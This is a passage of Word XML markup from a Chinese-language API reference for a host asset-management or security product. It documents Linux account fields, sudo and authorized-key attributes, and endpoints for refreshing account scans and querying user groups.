      <w:tr w:rsidR="00BC669E" w14:paraId="24B758EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D743F8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB72D8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315BB445" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261F9582" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账户登录方式，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">可用 0 不可登陆 1 key登陆 2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">登陆 3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>key&amp;pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2315F416" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28DB0E28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76BAE5C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0CF30E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD5471D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>交互登录方式，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用 0 不可登录 1 不可交互登录 2 可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04819E8F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C41AD96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>passwordInactiveDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAD12CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B75554" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44517851" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码过期后变成无效的天数，-1为无限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AF7E73F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAC9356" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269D3DB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79551F25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5198B8D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>权限，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="416079D1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436F3F3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorizedKeys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDA01F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F8A55C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>encryptType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：varchar(512) comment：varchar(512) value：varchar(512) MD5：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="090935C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号公</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>钥</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>信息，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">可用 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>encryptType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：加密类型 comment：备注信息 value：公</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>钥</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>的值 MD5：MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D2E2A0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc115166097"/>
      <w:bookmarkStart w:id="46" w:name="系统账号信息扫描"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:t>系统账号信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5F1040D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求系统账号信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D944536" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2FD893" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/account/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22943C79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0A2DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D48E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D1BF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/account/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D60E9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBBF68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEAC3DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68A8E9"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5924D240"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062F476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4A2D8C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26627FD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BCE39C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218BAB17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4905FD04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED22CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4007E965" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A91A2A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1019CE24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05C8564D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc115166098"/>
      <w:bookmarkStart w:id="48" w:name="系统账号信息查询扫描状态"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>系统账号信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="71A38543" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询系统账号信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C4B82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc115166099"/>
      <w:bookmarkStart w:id="50" w:name="用户组信息"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:t>用户组信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="092990EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询系统用户组，将按每台主机每个用户组展示；每个用户组均提供其包含的用户，但仅包含用户名；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA96748" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBFBD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的用户组信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B283F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215B23A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75634A69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A9B32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690D382" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F164A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6FC96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4C8F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE16E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538162B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B54613" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E0BD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28EEC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc115166100"/>
      <w:bookmarkStart w:id="52" w:name="用户组信息查询结果"/>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="1C5D2090" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询用户组信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB6E6E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4839B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9B5C9"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="75A9937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1BFD030" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A29820" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B309E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D8F8337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="560FF0D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
